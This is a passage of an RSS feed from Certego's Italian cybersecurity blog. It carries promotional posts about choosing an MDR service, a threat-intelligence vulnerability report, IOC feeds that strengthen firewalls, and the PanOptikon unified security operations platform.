      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACcklEQVR42lWST1PTUBTFs/Rb6MKdfgp164aVS1k5gqLjwIg7u3JGVBaO49Jxo8hoAVuVWostraWhYKmlTZrSUNqXl79tCQQdouR40+mGxW9y33u575177xEM0/K7vb7f6+/7Trfnm5Z9Gts5tdYN0+8wzee64Ye5Q45p/4S+fYEClLbKEIsbqMl1MKZB3W1hp7mLxk5zwE5IU4XGDRimDZ3r0HV9EIcw3Qwsuwt60BNarTYikYe4MzGB9/PzcPtdeO4+/v75PUw04B8f41MshvRqFiuqg+g2wwIRq2pINUykGzxYV3WYpukJhmGgKKtIliTE8puYS4sQ6bBkemCOi37fhf/vBIsLUSSSKRRaDpYqe0hIGlYUjnqbQ221gw6p1zj3BOoF6lTOL0lBRVZQ2pawUa5g9H4E049nMTp6HZcuX8Gt2xMQCyIymQxiS4uIk+LP8TjSmVWsFQqBpnG0O+xI0Kgsz/NwRLiui8ODg0E8++IlxqamcPfeJM6dPY9rIyMoFotYTX1DavkL0sllRN/NQa6UoRtGEAqjoXgCo5u3tmVUpQY63AIn6TJzcPVtEReexXHxyUecGXuOkckI1tfymNk0MZXjmM7reJDneCQytJkWhL3mBvUwVJjN5ZFIJPE9k0WWGh9LZXBj/gdufihgPCpiPF7GzJslunANr6o2nq4zzIZsaHhNa5pwQLZDh1EPQ9s0VRWSLKMm1UhpDbIsQWvUwJQqWJ2QK9htKNhrM3hdC55j4tA24BEK/SvJSiDXldBuNGXTohcc2E5vSHeAOUS3Bj6DFkLV7JFPNRLBKS88+5rOkZ1ywXIigZ+lkvcfsqyuVm1x1+IAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/01a2d2c15569ede70958143f209e6dae/71c1d/cover%20whitepaper%20mdr%20migliore.png&quot; srcset=&quot;/website/static/01a2d2c15569ede70958143f209e6dae/804b2/cover%20whitepaper%20mdr%20migliore.png 384w,
/website/static/01a2d2c15569ede70958143f209e6dae/e5715/cover%20whitepaper%20mdr%20migliore.png 768w,
/website/static/01a2d2c15569ede70958143f209e6dae/71c1d/cover%20whitepaper%20mdr%20migliore.png 1536w,
/website/static/01a2d2c15569ede70958143f209e6dae/a878e/cover%20whitepaper%20mdr%20migliore.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Come scegliere il servizio MDR migliore per la tua azienda]]></title><description><![CDATA[La guida definita per la scelta consapevole del tuo partner MDR]]></description><link>https://www.certego.net/blog/whitepaper-come-scegliere-il-servizio-mdr-migliore-per-la-tua-azienda/</link><guid isPermaLink="false">whitepaper-come-scegliere-il-servizio-mdr-migliore-per-la-tua-azienda</guid><category><![CDATA[Whitepaper]]></category><pubDate>Wed, 23 Oct 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nel contesto attuale della sicurezza informatica, i servizi di Managed Detection and Response (MDR) offrono una soluzione di cybersecurity che combina tecnologie avanzate e competenze umane per rilevare e rispondere rapidamente alle minacce, ampliando le capacità difensive di un&apos;organizzazione.&lt;/p&gt;
&lt;p&gt;Nel panorama odierno, caratterizzato da una crescente offerta di soluzioni di cybersecurity, le aziende si trovano spesso di fronte a un&apos;ampia gamma di servizi MDR disponibili sul mercato. Questa abbondanza di opzioni, pur rappresentando un vantaggio in termini di scelta, può talvolta rendere difficile identificare il provider più adatto alle proprie esigenze specifiche.&lt;/p&gt;
&lt;p&gt;Per supportarti in questo processo decisionale, abbiamo realizzato una guida dettagliata intitolata &quot;Come scegliere il servizio MDR migliore per la tua azienda.&quot; La guida esamina in profondità le caratteristiche essenziali che un provider MDR dovrebbe possedere per soddisfare le necessità della tua organizzazione. Inoltre, include la lista di domande chiave da porre al fornitore, pensata per aiutarti a valutare in modo critico e approfondito le diverse opzioni disponibili, garantendo così una scelta pienamente consapevole e allineata alle tue esigenze.&lt;/p&gt;
&lt;p&gt;Compila il form per ricevere la guida completa.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Settembre 2024]]></description><link>https://www.certego.net/blog/whitepaper-settembre-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-settembre-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Tue, 01 Oct 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di settembre 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[IOC Feed]]></title><description><![CDATA[Potenzia i firewall e svolgi indagini più avanzate]]></description><link>https://www.certego.net/blog/ioc-feed-potenzia-i-firewall-e-svolgi-indagini-piu-avanzate/</link><guid isPermaLink="false">ioc-feed-potenzia-i-firewall-e-svolgi-indagini-piu-avanzate</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 26 Sep 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Per ottimizzare il rilevamento e la prevenzione degli attacchi, è essenziale sviluppare una strategia di Threat Intelligence in grado di potenziare le operazioni di Detection e Response. Ciò avviene analizzando e contestualizzando gli attacchi, identificando gli attori malevoli, le loro motivazioni e le risorse utilizzate.&lt;/p&gt;
&lt;p&gt;Gli IOC (Indicatori di Compromissione) rappresentano le tracce concrete di un incidente informatico: consentono di rilevare potenziali violazioni e offrono informazioni cruciali per comprendere a fondo la natura di un attacco, migliorare le difese e prevenire attacchi futuri.&lt;/p&gt;
&lt;p&gt;Questi indicatori, raccolti dopo una compromissione, sono fondamentali per rafforzare le strategie di sicurezza e ridurre il rischio di nuove vulnerabilità&lt;/p&gt;
&lt;p&gt;Gli IOC svolgono due attività fondamentali:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Potenziamento dei Firewall:&lt;/h3&gt;
&lt;p&gt;Rappresentano uno strumento cruciale per potenziare le capacità di difesa dei firewall. L&apos;importazione e l&apos;applicazione di IOC aggiornati consentono ai firewall di identificare con maggiore precisione comportamenti sospetti o malevoli di ultima generazione, &lt;a href=&quot;https://www.certego.net/blog/riduzione-dei-falsi-positivi-strategia-certego-mdr-efficace/&quot;&gt;riducendo i falsi positivi&lt;/a&gt; e aumentando l&apos;efficacia complessiva delle difese.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Analisi più avanzate:&lt;/h3&gt;
&lt;p&gt;Consentono agli analisti di poter contare su dati di analisi sempre aggiornati, per condurre indagini più approfondite, comprendere la natura di un attacco e bloccarlo. Permettono di implementare linee di difesa aggiornate e di adattare le strategie di sicurezza in base alle nuove minacce rilevate, aumentando la resilienza complessiva.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;Ecosistema Applicativo e Threat Intelligence proprietaria di Certego&lt;/h2&gt;
&lt;p&gt;Gli IOC raggiungono il loro pieno potenziale solo se vengono adeguatamente monitorati e gestiti, trasformandosi da semplici identificatori in informazioni azionabili per i firewall e per le attività di analisi.&lt;/p&gt;
&lt;p&gt;Per migliorare le performance degli nostri IOC proprietari e quelli di terze parti, in Certego abbiamo sviluppato un ecosistema applicativo proprietario di Threat Intelligence che raccoglie, classifica, analizza e condivide i dati di intelligence sulle
minacce informatiche 24 ore su 24.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Threat Intelligence focalizzata sul mercato italiano&lt;/h2&gt;
&lt;p&gt;A differenza degli IOC di fonti internazionali, quelli di Certego sono classificati per le specifiche esigenze delle aziende italiane.&lt;/p&gt;
&lt;p&gt;Grazie alla visibilità su oltre 200 clienti e al dislocamento di honeypot proprietari su infrastrutture italiane, Certego trasforma i dati di intelligence in informazioni azionabili, applicabili in tempo reale alle blocklist dei firewall e nei sistemi di monitoraggio e analisi in uso agli analisti per rilevare e bloccare gli attacchi emergenti a cui le aziende italiane sono più esposte.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tempestività:&lt;/strong&gt; Gli IOC vengono integrati in tempo reale nelle regole dei firewall e nei sistemi di monitoraggio, consentendo di bloccare le minacce emergenti con maggiore rapidità ed efficacia, riducendo i falsi positivi. Consentono agli analisti di condurre analisi più accurate e approfondite, sfruttando informazioni aggiornate in tempo reale.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Precisione:&lt;/strong&gt; Sono accuratamente verificati e aggiornati per garantire elevati standard di affidabilità, aiutando i firewall ad eseguire più blocchi e gli analisti a svolgere indagini più approfondite&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Rilevanza:&lt;/strong&gt; Offrono un contesto ricco, con dettagli sulla fonte, le metodologie e sul potenziale impatto.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;Esempio pratico: Potenziamento dei Firewall&lt;/h2&gt;
&lt;p&gt;Prendiamo in esame due casi pratici reali per analizzare come l’applicazione degli IOC di Certego abbia contribuito a incrementare  i blocchi dei firewall di due aziende clienti:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Azienda Enterprise settore Finance:&lt;/h3&gt;
l’integrazione degli IOC di Certego sui firewall ha portato a un incremento del +10% dei blocchi dei firewall. In una settimana, sono stati bloccati 20 milioni di tentativi di connessione da indirizzi IP classificati come malevoli da parte di Certego.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/adf3ed715f0c602c583684c290a7f28d/a878e/ioc%20certego%20finance.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 38.020833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAC4jAAAuIwF4pT92AAABp0lEQVR42jVPS0sbURSeX9Au3BQMaqEL6WslBX9O617cWaFQKF13VYriohGTRkmqdOkutGhLQKgYgm3NTGaSeWUS78zcx7lz74y3N5FwPs6L7/s4xxgg2kcsYZzzDHhWFIWQOSFECIEJoRjrLaWMMcCUEQqcQc6hyEATDNAKHTNIIQhkKEkBoJCyM8RhyjAFlWfb7fFa01eC/3LTEysWQhpT14nxXZmNDDKhBLxr+c+/OuXODWaw+s0pfbFeNv2VY+dBxTrsplo8pd9pZpkSqg9UKn/bCuf2zRfHzqum/+iw97huL9as5bqtXXavEkMCm/zA4TbTzzAJIDkIYPp+Jfmbn97igf2sYS8d9J7UbS1+2piMCzXr85/EsEapfYOvInwZJN0xcREeIOIh3ENU3crNM/9++fphzSxVu/OVbqlqzlfMhap5r3y93YmNjxfRzkXw4Tx43wo+/Q73LsO99nC/PTz6O1KqaPxD69+9rTPv9am7OYXut07djabzwyUG4jnFKU0TIDrHaTJBEsfAqFIqxmQQjYPAj1xHI+zbkdsfef2MYqXUf+rElNALIF8NAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/adf3ed715f0c602c583684c290a7f28d/71c1d/ioc%20certego%20finance.png&quot; srcset=&quot;/website/static/adf3ed715f0c602c583684c290a7f28d/804b2/ioc%20certego%20finance.png 384w,
/website/static/adf3ed715f0c602c583684c290a7f28d/e5715/ioc%20certego%20finance.png 768w,
/website/static/adf3ed715f0c602c583684c290a7f28d/71c1d/ioc%20certego%20finance.png 1536w,
/website/static/adf3ed715f0c602c583684c290a7f28d/a878e/ioc%20certego%20finance.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Azienda Enterprise settore Manufacturing:&lt;/h3&gt;
l’integrazione degli IOC di Certego sui firewall ha portato a un incremento del +21% dei blocchi dei firewall. In una settimana, sono stati bloccati 12 milioni di tentativi di connessione provenienti da IP identificati come pericolosi da Certego.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/53d4f468d91944cfcd817dd2a5f68a21/a878e/ioc%20certego%20manufacturing.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 38.020833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAC4jAAAuIwF4pT92AAABiUlEQVR42l2Ou0scURjF508IQqqAClE7Ef+PtBbphdSChSIqu8I2QUtBC0nAUUF7QbCI4q7rO2CRwh134jx3Jovzuu9HvtllETz87oHLved8n+EnxEvIa8Eo5YBSSkhVICSEoJSmaYYJQ5gChLyBMeVcGFLIPqIHhAmXeYE4PArBMNKcqB4QwhhnBcoLnOeIUmZIWQbeSffEGW1Hr2vX0fp9tHEfz1+EmBAtqOJUM6IlN3Tvs1AaElAjBvCyQW4/xkM/rWHzGfi0ay1fdmo30BXXneQxRoZSUvdHDQb2JcvDtn6HYwf29JE9dWRPHtpj++1hsz1xAP5cu+saX47dmRP321nw9dSb/RXM1cPKbfz94d9hK4H05kPn44+nz2ZrxLRGdlujJdb4nvVh56l6ExsrV52VZrDU8JZL94HVpr9Y98w/XVjm3EkX60GlGVQaXvXSqwANb63pL5y/nNipQYRkOOdFyoqUo4znCcsSuAqcw+I5wm7c9cNO5P6NPCd0bPDYd3GWaKX+Aw7NnL2FIw8rAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 2&quot; title=&quot;&quot; src=&quot;/website/static/53d4f468d91944cfcd817dd2a5f68a21/71c1d/ioc%20certego%20manufacturing.png&quot; srcset=&quot;/website/static/53d4f468d91944cfcd817dd2a5f68a21/804b2/ioc%20certego%20manufacturing.png 384w,
/website/static/53d4f468d91944cfcd817dd2a5f68a21/e5715/ioc%20certego%20manufacturing.png 768w,
/website/static/53d4f468d91944cfcd817dd2a5f68a21/71c1d/ioc%20certego%20manufacturing.png 1536w,
/website/static/53d4f468d91944cfcd817dd2a5f68a21/a878e/ioc%20certego%20manufacturing.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
Questi risultati dimostrano come l&apos;adozione degli IOC possa potenziare le difese aziendali contro le minacce emergenti, riducendo i rischi e ottimizzando il carico di lavoro dei team di sicurezza. Grazie al miglioramento del rilevamento e del blocco automatico da parte dei firewall, gli analisti sono chiamati a gestire un numero inferiore di incidenti, permettendo loro di concentrarsi su attività strategiche di analisi e risposta più mirata
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Esempio pratico: Analisi più Avanzate&lt;/h2&gt;
&lt;p&gt;Gli analisti di sicurezza possono trarre grandi vantaggi dall&apos;uso degli IOC (Indicatori di Compromissione), soprattutto quando questi sono integrati con strumenti avanzati di gestione della sicurezza, come la nostra piattaforma di &lt;a href=&quot;https://www.certego.net/platform/security-operations-platform/&quot;&gt;Unified Security Operations, PanOptikon®&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Gli IOC aiutano a migliorare la precisione e la velocità di rilevamento, oltre a ridurre i tempi di risposta agli incidenti.&lt;/p&gt;
&lt;p&gt;Supponiamo che gli analisti di Certego rilevino un file sospetto sulla rete di una azienda cliente. Gli IOC, come ad file hash unici e IP, possono essere rapidamente consultati grazie all’ecosistema proprietario di Threat Intelligence che collega l&apos;hash a una campagna di attacchi già nota.&lt;/p&gt;
&lt;p&gt;Grazie a questa correlazione con attacchi precedentemente analizzati, gli analisti non solo identificano la tipologia di attacco in questione, ma possono anche accedere a informazioni dettagliate sulle tecniche, tattiche e procedure (TTP) utilizzate dal gruppo di attacco.&lt;/p&gt;
&lt;p&gt;Queste informazioni permettono al team di bloccare l&apos;attacco più velocemente, aggiornando rapidamente le regole del firewall e isolando le macchine compromesse.&lt;/p&gt;
&lt;p&gt;Inoltre, la presenza di IOC correlati può segnalare altri attacchi simili che potrebbero essere stati lanciati contemporaneamente, consentendo una risposta più ampia e preventiva.&lt;/p&gt;
&lt;p&gt;In questo modo, gli IOC aiutano a bloccare più velocemente non solo l&apos;attacco attuale, ma anche a prevenire eventuali tentativi futuri collegati.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;p&gt;Gli esempi pratici discussi dimostrano chiaramente come l&apos;uso degli IOC possa potenziare sia le difese proattive, ottimizzando i firewall, sia le capacità di risposta rapida degli analisti. L&apos;adozione di questi strumenti consente alle organizzazioni di essere più preparate a fronteggiare minacce sempre più sofisticate, riducendo tempi di reazione e prevenendo efficacemente attacchi futuri.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Unified Security Operations Platform]]></title><description><![CDATA[La chiave per una Sicurezza Centralizzata e Proattiva]]></description><link>https://www.certego.net/blog/unified-security-operations-platform-la-chiave-per-una-sicurezza-centralizzata-e-proattiva/</link><guid isPermaLink="false">unified-security-operations-platform-la-chiave-per-una-sicurezza-centralizzata-e-proattiva</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 17 Sep 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Immagina la sicurezza della tua azienda come un&apos;orchestra, dove ogni musicista suona il proprio strumento. Se manca un direttore d&apos;orchestra il risultato può essere caotico, nonostante l&apos;impegno di ogni singolo elemento. Allo stesso modo, nel mondo della cybersecurity, ogni strumento di sicurezza, se agisce in modo isolato, rischia di non garantire la protezione adeguata.&lt;/p&gt;
&lt;p&gt;Una piattaforma di Unified Security Operations funge da direttore d&apos;orchestra, coordinando centralmente le attività di &lt;strong&gt;MDR (Managed Detection and Response)&lt;/strong&gt; e &lt;strong&gt;Cyber Risk Monitoring&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Fornisce una visione completa e continua degli asset IT, come endpoint, reti e cloud. Il suo compito è aggregare, arricchire e analizzare i dati provenienti da queste diverse fonti, trasformandoli in informazioni utili per mantenere i sistemi di difesa sempre aggiornati, rilevare le minacce di ultima generazione e rispondere agli incidenti in maniera più agile e rapida.&lt;/p&gt;
&lt;p&gt;L’obiettivo principale è &lt;strong&gt;elevare il monitoraggio della sicurezza a un nuovo livello, unificando i vari aspetti della cybersecurity in un&apos;unica piattaforma&lt;/strong&gt;. Grazie a questa visione centralizzata, ogni componente dell&apos;infrastruttura aziendale viene costantemente monitorata e protetta attraverso un&apos;unica soluzione, assicurando una risposta proattiva e tempestiva agli incidenti 24/7, migliorando così l&apos;efficienza operativa e la sicurezza complessiva dell&apos;organizzazione.&lt;/p&gt;
&lt;p&gt;L’approccio alla cybersecurity di Certego si basa su PanOptikon®, la nostra piattaforma proprietaria di Unified Security Operations progettata per erogare servizi MDR personalizzati e scalabili.&lt;/p&gt;
&lt;p&gt;In questo articolo, analizziamo quali sono i principali vantaggi di affidarsi a un servizio MDR basato su una piattaforma di Unified Security Operations, in grado di garantire una protezione proattiva per la tua azienda.&lt;/p&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;1. Visibilità centralizzata degli asset IT&lt;/h2&gt;
&lt;p&gt;La piattaforma PanOptikon® consente di aggrega i dati provenienti da rete, endpoint, cloud e strumenti di gestione delle vulnerabilità, offrendo una visione centralizzata e completa delle attività di sicurezza.
I team possono analizzare ogni singolo evento attraverso un&apos;unica interfaccia, evitando di passare tra strumenti diversi.&lt;/p&gt;
&lt;p&gt;Questa visione unificata è resa possibile dalla &lt;a href=&quot;https://www.certego.net/blog/telemetria-degli-endpoint-migliorare-la-sicurezza-con-un-approccio-basato-sulla-visibilita-dei-dati-telemetrici/&quot;&gt;&lt;strong&gt;visibilità del dato telemetrico degli endpoint&lt;/strong&gt;&lt;/a&gt; e dall&apos;integrazione nativa della funzionalità &lt;strong&gt;SIEM (Security Information and Event Management)&lt;/strong&gt; che consentono di raccogliere, correlare e analizzare in tempo reale i dati provenienti da diverse fonti, garantendo una visione completa dell&apos;ambiente di sicurezza aziendale.&lt;/p&gt;
&lt;h2&gt;2. Monitoraggio continuo del Cyber Risk&lt;/h2&gt;
&lt;p&gt;PanOptikon® consente di monitorare costantemente i livelli di sicurezza dell&apos;organizzazione, fornendo una &lt;strong&gt;visione chiara e aggiornata del rischio informatico&lt;/strong&gt; a cui è esposta. Questo approccio proattivo all&apos;ottimizzazione della gestione del rischio offre un quadro completo delle debolezze dell&apos;infrastruttura IT, consentendo interventi rapidi e mirati per mitigare i rischi e rafforzare la protezione aziendale.&lt;/p&gt;
&lt;h2&gt;3. Rilevamento delle minacce in tempo reale&lt;/h2&gt;
&lt;p&gt;Grazie alla visibilità avanzata dei dati degli endpoint, reti e cloud, la piattaforma rileva le minacce in tempo reale, &lt;strong&gt;correlando ogni singolo evento con le informazioni proprietarie di Threat Intelligence (IOC e BIOC) di Certego&lt;/strong&gt; che offrono informazioni aggiornate sulle nuove tecniche di attacco e le vulnerabilità emergenti, migliorando la precisione del rilevamento.&lt;/p&gt;
&lt;p&gt;La piattaforma consente di implementare regole di rilevamento personalizzate per le singole esigenze di ogni cliente, adattabili alle peculiarità infrastrutturali dell&apos;organizzazione.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/dcf0a1fd27d1bbb0f1a92bbbb2fb7f44/a878e/ecosistema-certego.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAC4jAAAuIwF4pT92AAACY0lEQVR42mWTO2/TUBTHXUJL1MdSRtQRUQSCSsykQoKJgYkvgASEMDCgDrD0Q3TMxICEmLIwVAyFoSktbhJHzsNJaudhO3ESO4821/b1tS/nNg4q5Ug/n6Nz//d/r+Vjjvs/5sJ8j4tG1y71/glK6ZwoigsMnufnz5u77dwSr2mLDA3I5XJLIIzcfXD/6e3n8RdQz+d2d5e0UMMo9XorbO94MnlGCGlQn4iOgzPpdPYGR3w69HzaAbrI87sIsqJqnbQgDn6X5VG13uwgMl3DsMa0hNLJ0Ha/jU7ReziQ9l3sE88LeD6/ztnYKwMCwl5eGzv5+sjOV7vDvKT3BcUwhWJ7cN5XgTPHy9sYCw72au3B+DNy8NbwDNEvPw6JgyZEKMm3OGVgPzqx0EPZQrHuGMXgwE0gdpFxQDd1WGuChmkbQ/vJz6q6Ztv2K4xdWqnViGWafkkGQzqNgD08Qmi5JtO+aVK93abNVou2Wio1LYteCJ89xsg+MkejLVZrZ9h3Pc8XBOGvIRMFGPh+mA1OqlJw9OsgyB7zgZDNBHKtGoSHMgjbcIps3rCsDybUacP2jYnny6XQ0AGhM80UhzjBdKcb9md5Et4QDI87fevj7ELwdsE+z69z9bbxVtJ7r8uqkQDelNROvKIbiYreixcaerzYNBKFsF8EDcuNTvddRjp5bA4GL5kbfGHsuq5zcJC5ORvQK2x4Wb5UR1i9vb19XrNBDmEaDgZ6WRSlDUlSNrLZwh3QXWVmEZjyxZ2dT9cVSqOKokSTyeTq3t7ecqVSuZZKpVZYDbqFZPLrKoP9GTPTy/EHtoV8BXGB7wIAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/dcf0a1fd27d1bbb0f1a92bbbb2fb7f44/71c1d/ecosistema-certego.png&quot; srcset=&quot;/website/static/dcf0a1fd27d1bbb0f1a92bbbb2fb7f44/804b2/ecosistema-certego.png 384w,
/website/static/dcf0a1fd27d1bbb0f1a92bbbb2fb7f44/e5715/ecosistema-certego.png 768w,
/website/static/dcf0a1fd27d1bbb0f1a92bbbb2fb7f44/71c1d/ecosistema-certego.png 1536w,
/website/static/dcf0a1fd27d1bbb0f1a92bbbb2fb7f44/a878e/ecosistema-certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;4. Riduzione dei tempi di risposta agli incidenti&lt;/h2&gt;
&lt;p&gt;La visibilità centralizzata degli eventi di security all’interno di un’unica console consente al team di Security Operations di Certego di &lt;strong&gt;svolgere analisi più approfondite e rapide&lt;/strong&gt;, correlando i dati provenienti da diverse fonti per fornire una visione chiara degli incidenti e agire con più dati alla mano.&lt;/p&gt;
&lt;h2&gt;5. Automazione e orchestrazione avanzata delle attività di cybersecurity&lt;/h2&gt;
&lt;p&gt;L’automazione è fondamentale per una gestione efficace e scalabile della sicurezza. La piattaforma PanOptikon® integra nativamente la funzione &lt;strong&gt;SOAR (Security Orchestration, Automation, and Response)&lt;/strong&gt; per automatizzare le attività ripetitive e orchestrare processi complessi. Ad esempio, la risposta a minacce più comuni può essere automatizzata, eliminando la necessità di intervento umano per operazioni quali l’isolamento di un endpoint compromesso o l’applicazione di patch di sicurezza.&lt;/p&gt;
&lt;p&gt;Queste automazioni non solo accelerano la risposta agli incidenti, ma consentono ai team di security di &lt;strong&gt;concentrarsi sulle minacce più complesse e sulle attività più strategiche&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;6. Riduzione dei falsi positivi&lt;/h2&gt;
&lt;p&gt;Un problema comune nella sicurezza informatica è l&apos;elevato volume di allarmi, spesso non critici, che può sovraccaricare i team di lavoro e rallentare la risposta.&lt;/p&gt;
&lt;p&gt;PanOptikon® risolve questo problema aggregando gli allarmi correlati in incidenti unici, grazie alla capacità di collegare tra di loro e in maniera automatizzata eventi provenienti da diverse fonti.&lt;/p&gt;
